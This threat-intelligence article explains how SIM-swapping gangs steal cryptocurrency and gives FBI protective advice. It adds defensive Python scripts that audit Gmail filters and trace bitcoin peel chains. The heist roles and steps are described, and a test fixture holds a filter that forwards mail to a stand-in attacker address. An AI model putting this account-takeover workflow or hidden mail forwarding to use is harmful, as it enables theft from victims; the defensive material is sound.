In the U.S. alone, SIM-swapping attacks resulted in $72 million worth of losses last year, four million dollars more than in 2021, according to the Federal Bureau of Investigation. In a 2022 public service announcement (PSA), the FBI defined SIM swapping as a “malicious technique where criminal actors target mobile carriers to gain access to victims’ bank accounts, virtual currency accounts, and other sensitive information.”
The PSA noted that threat actors “primarily conduct SIM swap schemes using social engineering, insider threat, or phishing techniques.” In the social-engineering variant, attackers impersonate the authorized account holder and dupe mobile-carrier customer service representatives into “switching the victim’s mobile number to a SIM card in the criminal’s possession,” according to the PSA.
Even more troubling are insider-threat scenarios, in which mobile-carrier employees act as co-conspirators, giving thieves access to the targeted customer accounts in exchange for a cut of the proceeds. These malicious insiders are often recruited on Dark Web cybercriminal forums and on Telegram.
Threat actors also direct phishing attacks at mobile-carrier employees. Attackers obtain employees’ contact details and send them emails or texts that impersonate trusted friends, business colleagues, or vendors. These messages carry a malware payload that attackers use to “hack mobile carrier systems that carry out SIM swaps,” according to the FBI.
Once attackers have swapped a victim’s SIM, the victim’s calls, texts, and mobile data are delivered to a device the attackers control. This rerouting of communications lets attackers submit “‘Forgot Password’ or ‘Account Recovery’ requests to the victim’s email and other online accounts associated with the victim’s mobile telephone number,” notes the PSA.
From here, threat actors exploit their control over the victim’s SMS-based two-factor authentication (2FA) codes to take over financial and other accounts of interest, resetting login credentials to lock the legitimate owner out of the online services they use. Over the last few years, cryptocurrency investors have been heavily targeted by SIM swappers.
A recent Forbes article describes one such case, in which Bart Stephens, a cofounder and managing partner of the crypto fund Blockchain Capital, fell victim to a SIM-swapping attack that resulted in the theft of “$6.3 million of bitcoin, ether and other cryptocurrencies from his digital wallets.” Stephens has filed a lawsuit against the SIM swapper, identified only as “Jane Doe” in the court filing, in an effort to recover his stolen digital assets.
The Dark Web & Telegram are Staging Points for SIM Swap Heists
Stephens’s lawsuit, filed in the Northern District of California this past August, alleges that the attacker “used personal information available online and on the dark web to bypass security checks with his cellular network provider and change account passwords in May,” per Forbes reporting. After taking over his mobile-carrier account, the attacker ordered a new cell phone and “ported Stephen’s private cell number to a SIM in the new device,” Forbes wrote.
In the Dark Web forum posts shown below, two threat actors specifically target Coinbase customers.
This crime is becoming increasingly accessible to young amateurs, as some threat actors publish and productize full-fledged SIM swapping guides on the Dark Web and Telegram.
Stephens’s lawsuit highlights the prominence of the underground cybercriminal ecosystem as a staging point for the commission of SIM swapping crimes. A recent article published in 404 Media explains how this ecosystem works by spotlighting the digital exploits of ACG, “a group of alleged hackers who the FBI says are responsible for a wave of Bitcoin thefts and other crimes,” according to the story.
The roughly six members of ACG “are a 21st century version of bank robbers. Instead of a gang lifting physical cash from a vault, these opportunists work together to quickly take over a target’s phone number, intercept their login codes, then pilfer any cryptocurrency they own before the victim has much of a chance to react at all,” according to the 404 Media story.
As the story notes, ACG is a subset of “The Comm,” a “nebulous network” of thousands of “hackers, gamers, and young girls” who correspond across roughly 100 Telegram channels and Discord servers, most of them fraud focused. Most members of this ecosystem are older teenagers and people in their early twenties.
More experienced cybercriminal members of the Comm also network on the Dark Web, selling access or recruiting team members and money mules on hacker forums like XSS, Exploit, Russian Anonymous Marketplace (RAMP), Breach Forums, and Dread.
But accomplished cybercriminals can also be found coordinating SIM swap attacks and conducting other illegal business in some of the Comm’s more prolific fraud-oriented Telegram groups. Cryptosec learned from cybercriminal sources that some of the Comm’s favored community resources for SIM swapping include the following Telegram channels: Sim Swamp, Sim Kitties, Omerta, Star Fraud, and others.
These are Telegram groups where experienced and budding SIM swappers and other cybercriminals network, looking for new scams and for partners to run them with.
When it comes to SIM swapping, the theme of partnership is key to understanding this attack typology. More lucrative heists are rarely the work of lone wolves. As the 404 Media story analogized, “Everyone in a bank job has a specific role. A SIM swapping gang is no different.”
Anatomy of a Heist
These thefts begin with a “Searcher, who breaks into a person’s email account, perhaps by using software to churn through a mass of potential passwords or buying the login credentials from another hacker,” according to 404 Media. Such credentials increasingly come from “logs” sold on the Dark Web by initial access brokers (IABs), who harvest them by mass-infecting devices with information stealers (info-stealers).
A recent research report by the Israeli threat intelligence company Hudson Rock noted that info-stealers harvest the following data from infected devices:
- Credentials: login URLs, usernames, and passwords saved in browsers such as Google Chrome.
- Documents and text files: info-stealers look for high-risk files containing financial information, corporate data, secret keys, 2FA backup codes, server passwords, crypto private keys, and the like.
- Machine-specific properties
More advanced versions of these trojans can evade current anti-virus (AV) software, according to Hudson Rock. People typically become infected after downloading pirated software laced with the trojan, Hudson Rock notes. One info-stealer that is particularly popular among the cybercriminal elite is Raccoon.
On August 14, following a six-month absence, the developers of this info-stealer announced the release of the Raccoon version 2.3.0 across multiple cybercriminal forums.
In the post below, the threat actor ‘churk’ solicits access to logs for American Coinbase and Kraken customers.
Other Searchers, like the Canadian scammer ‘Yahya,’ recently exposed by the blockchain investigator ZachXBT, apparently had access to a compromised Twitter (now X) admin panel that allowed him to micro-target users who were more likely to hold large sums of crypto.
Once Searchers compromise a victim’s email account, they scour the inbox for indicators that the target owns significant amounts of crypto, per the 404 Media report. Markers that Searchers look for include emails displaying the victim’s Bitcoin balance, a receipt from a previous liquidation of crypto, or “anything that would signal this target is worth pushing to the next step,” according to the report.
“Once the Searcher gets a hit, they prepare to cover the gang’s tracks. They configure the inbox to hide incoming emails from the target’s Bitcoin exchange,” noted the 404 Media story. This step is analogous to knocking out the security cameras.
Searchers take this measure to set the stage for the later phases of the heist, when their co-conspirators swap the target’s SIM and access the victim’s crypto account. If the exchange then flags an unusual login or transaction, its alerts never reach the victim.
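The inbox tampering described above is something a defender can check for directly. As an added example that is not part of the original article, the Python below parses a Gmail filter export (the Atom XML feed Gmail produces when you export filters) and flags any rule that archives, trashes, or marks as read mail mentioning a watched exchange or bank, and, going slightly beyond the article’s scenario, any rule that silently forwards mail to another address regardless of sender. The filter export is constructed for the example, and the watch-list of sender domains is an assumption to adapt to your own accounts.

```python
import xml.etree.ElementTree as ET

NS = {"atom": "http://www.w3.org/2005/Atom",
      "apps": "http://schemas.google.com/apps/2006"}

# Senders whose notifications must never be silently hidden. Assumed
# list: put the notification domains of your own exchanges and banks here.
WATCHED_SENDERS = ("coinbase.com", "kraken.com", "example-bank.com")

# Gmail filter criteria that can name a sender or keyword.
CRITERIA = ("from", "to", "subject", "hasTheWord")
# Filter actions that keep a matching message out of the owner's sight.
HIDING_ACTIONS = ("shouldArchive", "shouldTrash", "shouldMarkAsRead")

# Constructed Gmail filter export: a benign newsletter rule, a rule that
# buries Coinbase mail, a rule that forwards anything mentioning Kraken,
# and a benign labelling rule for Coinbase mail that must not be flagged.
SAMPLE_EXPORT = """<feed xmlns='http://www.w3.org/2005/Atom'
      xmlns:apps='http://schemas.google.com/apps/2006'>
  <title>Mail Filters</title>
  <entry>
    <id>tag:mail.google.com,2008:filter:1</id>
    <apps:property name='from' value='newsletter@example.com'/>
    <apps:property name='label' value='Newsletters'/>
    <apps:property name='shouldArchive' value='true'/>
  </entry>
  <entry>
    <id>tag:mail.google.com,2008:filter:2</id>
    <apps:property name='from' value='no-reply@coinbase.com'/>
    <apps:property name='shouldArchive' value='true'/>
    <apps:property name='shouldMarkAsRead' value='true'/>
    <apps:property name='shouldTrash' value='true'/>
  </entry>
  <entry>
    <id>tag:mail.google.com,2008:filter:3</id>
    <apps:property name='hasTheWord' value='kraken'/>
    <apps:property name='forwardTo' value='drop@attacker.example'/>
  </entry>
  <entry>
    <id>tag:mail.google.com,2008:filter:4</id>
    <apps:property name='from' value='no-reply@coinbase.com'/>
    <apps:property name='label' value='Exchanges'/>
  </entry>
</feed>"""


def _mentions_watched(text):
    """Return the watched domain a criterion value refers to, or None.
    Matches the full domain or its bare name, so a keyword rule on
    'kraken' still counts."""
    text = text.lower()
    for domain in WATCHED_SENDERS:
        if domain in text or domain.split(".")[0] in text:
            return domain
    return None


def audit_filters(xml_text):
    """Return one finding per suspicious filter entry, in export order."""
    findings = []
    root = ET.fromstring(xml_text)
    for entry in root.findall("atom:entry", NS):
        entry_id = entry.findtext("atom:id", default="?", namespaces=NS)
        props = {p.get("name"): p.get("value")
                 for p in entry.findall("apps:property", NS)}
        criteria = {k: v for k, v in props.items() if k in CRITERIA}
        hides = [a for a in HIDING_ACTIONS if props.get(a) == "true"]
        forward = props.get("forwardTo")

        if forward:
            # Silent forwarding is an account-takeover indicator on its
            # own, whatever the rule matches.
            findings.append({"id": entry_id, "criteria": criteria,
                             "reason": f"forwards matching mail to {forward}"})
            continue

        matched = next((m for m in map(_mentions_watched, criteria.values())
                        if m), None)
        if matched and hides:
            findings.append({"id": entry_id, "criteria": criteria,
                             "reason": f"hides mail mentioning {matched}: "
                                       + ", ".join(hides)})
    return findings


if __name__ == "__main__":
    for f in audit_filters(SAMPLE_EXPORT):
        print(f["id"], f["criteria"], "->", f["reason"])
```

The same check belongs in the account-recovery playbook for an organisation’s mailboxes: a rule that routes exchange or bank notifications to the trash is rarely something the owner created.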
In the next phase of the attack, the social-engineering ruse, the “Caller steps in,” noted 404 Media. “This person is the sweetalker, the one who is going to trick the bank employees to let them into the vault,” according to 404 Media. In this case, the vault is the victim’s mobile-carrier account, and the mark, the immediate target of the social engineering, is the carrier’s customer support representative.
The Caller impersonates the targeted account holder and feigns one of a variety of scenarios. Common ruses noted by the 404 Media report include “I’ve lost my phone” or “I need to transfer my number to a new one.” These sweet talkers are often armed with a war chest of personally identifiable information (PII) about their target, such as birthdate, address, and Social Security number. This level of preparation makes the social engineering that much more convincing.
Once the Caller dupes the telecom provider’s customer service rep into porting the number to one in the gang’s control, the SIM swap is complete. Now, the actual crypto heist begins, as the “Holder,” or the gang member who actually has control over the SIM-swapped phone, receives the 2FA codes from the exchange, according to 404 Media.
“The Holder then relays those codes back to the Searcher, who has since moved on to a more aggressive role. They finally enter the target’s cryptocurrency accounts, and start filling their duffel bags” with crypto, noted 404 Media. The Searcher transfers crypto from the victim’s exchange account to wallets the gang controls, while the Holder continues to relay 2FA authorization codes back to them from the SIM-swapped phone.
From there, more sophisticated SIM-swap gangs can launder their funds through a variety of methods, including mixing, chain-hopping across different cryptocurrencies, and peel chains that split the proceeds across a long and labyrinthine series of smaller transactions. However, some ACG members, and many other threat actors, apparently lack basic operational security (OpSec).
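The peel-chain pattern mentioned above is also what an investigator looks for when tracing stolen funds. As an added example that is not code from the article or from 404 Media, the Python below implements the simplest peel-chain heuristic over a constructed set of transactions: starting from the transaction that first moves the stolen funds, follow the larger (“change”) output forward for as long as each transaction has exactly two outputs, the smaller output stays under a set fraction of the value spent, and the change is consumed as the sole input of the next transaction. The transaction data, the 30% peel threshold and the three-hop minimum are assumptions, and fees are omitted from the constructed amounts.

```python
from dataclasses import dataclass


@dataclass
class Tx:
    txid: str
    inputs: list    # outpoints (txid, vout) this transaction spends
    outputs: list   # output values in satoshis, indexed by vout


# Constructed data: 5 BTC leave the victim's exchange account in t0 and
# are peeled three times before an even split in t3 ends the pattern.
SAMPLE_TXS = [
    Tx("t0", [("victim_withdrawal", 0)], [60_000_000, 440_000_000]),
    Tx("t1", [("t0", 1)], [390_000_000, 50_000_000]),   # change may sit at vout 0
    Tx("t2", [("t1", 0)], [70_000_000, 320_000_000]),
    Tx("t3", [("t2", 1)], [160_000_000, 160_000_000]),  # even split: not a peel
    Tx("t4", [("t3", 0)], [160_000_000]),
]


def build_spender_index(txs):
    """Map each spent outpoint to the txid that spends it."""
    spent_by = {}
    for tx in txs:
        for outpoint in tx.inputs:
            spent_by[outpoint] = tx.txid
    return spent_by


def follow_peel_chain(txs, start_txid, max_peel_fraction=0.3, min_hops=3):
    """Walk forward from start_txid while each hop looks like a peel.
    Returns None unless at least min_hops consecutive peels are found;
    otherwise returns the hops, the total peeled off, and the outpoint
    where the unpeeled remainder currently sits."""
    by_id = {t.txid: t for t in txs}
    spent_by = build_spender_index(txs)
    hops, peeled = [], []
    txid, change_outpoint, remaining = start_txid, None, 0
    while txid in by_id and txid not in hops:
        tx = by_id[txid]
        # After the first hop the transaction must be funded only by the
        # previous change output; extra inputs mean consolidation, not a peel.
        if hops and tx.inputs != [change_outpoint]:
            break
        if len(tx.outputs) != 2:
            break
        small_idx = 0 if tx.outputs[0] < tx.outputs[1] else 1
        small, large = tx.outputs[small_idx], tx.outputs[1 - small_idx]
        if small > max_peel_fraction * (small + large):
            break  # a near-even split reads as an ordinary payment
        hops.append(txid)
        peeled.append(small)
        remaining = large
        change_outpoint = (txid, 1 - small_idx)
        txid = spent_by.get(change_outpoint)
    if len(hops) < min_hops:
        return None
    return {"hops": hops, "peeled_sats": sum(peeled),
            "tail_sats": remaining, "tail_outpoint": change_outpoint}


if __name__ == "__main__":
    print(follow_peel_chain(SAMPLE_TXS, "t0"))
```

The tail outpoint is the practically useful result: it is where the bulk of the funds still sit, and therefore the address to watch or to ask an exchange to freeze if it is ever deposited. Real tracing adds address clustering and fee handling on top of this skeleton, but the stopping rules above (an even split, or a consolidation with outside inputs) are where most automated traces lose the trail.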
As Joseph Cox, the author of the 404 Media article noted in the comments section of his story, “It’s so funny that even with a bunch of bitcoin tracing tools available, they don’t even come up in the court records. Who needs them when hackers are using phones in their own names.”
As 404 Media illustrated, modern, high-stakes SIM swapping increasingly takes the form of an organized conspiracy, with multiple threat actors operating as a gang. The Dark Web and Telegram offer individual SIM swappers and organized gangs a plethora of resources to recruit co-conspirators and identify victims.
The most concerning aspect of this attack typology is the prevalence of malicious telecom insiders who are willfully complicit in the illegal transfer of customers’ mobile accounts to bad actors. The aggressive resurgence of SIM swapping also illustrates the rise of a new generation of cybercriminals and fraudsters, predominantly in the West, who are loosely networked via the underground Comm ecosystem.
Comm-nexus threat actors, which Microsoft has dubbed “Octo Tempest,” were even reportedly involved in the ransomware attacks, with losses in the tens of millions of dollars, that struck Caesars Entertainment and MGM Resorts International. The cybersecurity company Morphisec believes that Octo Tempest initiated its attack on MGM by first phishing an administrator via SMS.
This initial compromise enabled Octo Tempest to SIM swap the admin, which in turn gave the group access to MGM’s cloud environment, where it deployed ALPHV ransomware. As Microsoft noted in a recent research report, the group became an ALPHV affiliate in June. Microsoft said ALPHV’s acceptance of Octo Tempest is “notable in that, historically, Eastern European ransomware groups refused to do business with native English-speaking criminals.”
Microsoft said that “Octo Tempest leverages broad social engineering campaigns to compromise organizations across the globe with the goal of financial extortion.” Research into this group, which “overlaps with research associated with 0ktapus, Scattered Spider, and UNC3944, was initially seen in early 2022, targeting mobile telecommunications and business process outsourcing organizations to initiate” SIM swaps, according to Microsoft.
Initially, Microsoft said, Octo Tempest monetized its intrusions by “selling SIM swaps to other criminals and performing account takeovers of high-net-worth individuals to steal their cryptocurrency.” The group has since evolved from SIM swap attacks to ransomware extortion of $15 million and more against major casino and gaming companies, and has thus emerged as “one of the most dangerous financial criminal groups,” Microsoft cautions.
The rise of Octo Tempest illustrates that SIM swap threat actors are becoming increasingly more sophisticated. To protect themselves from SIM swappers, digital-asset investors and users should do the following according to the 2022 FBI advisory:
- Do not advertise information about cryptocurrency assets on social media or forums.
- Do not provide your mobile carrier account information over the phone to anyone who requests your account password or PIN.
- Avoid posting personal information online, such as mobile phone number, address, or other PII.
- Use a unique password for each online account.
- Monitor changes in SMS-based connectivity; a sudden loss of service can be the first sign that your number has been ported.
- Use strong multi-factor authentication methods such as biometrics, physical security tokens, or standalone authentication applications to access online accounts.
- Do not store passwords, usernames, or other information for easy login on mobile device applications.
Beyond these FBI tips, crypto users should also work with a threat intelligence vendor to rapidly identify the leakage of their PII and login credentials on the Dark Web and mitigate the risk of account compromise.
For over 30 years, Marin Ivezic has been protecting critical infrastructure and financial services against cyber, financial crime and regulatory risks posed by complex and emerging technologies.
He held multiple interim CISO and technology leadership roles in Global 2000 companies.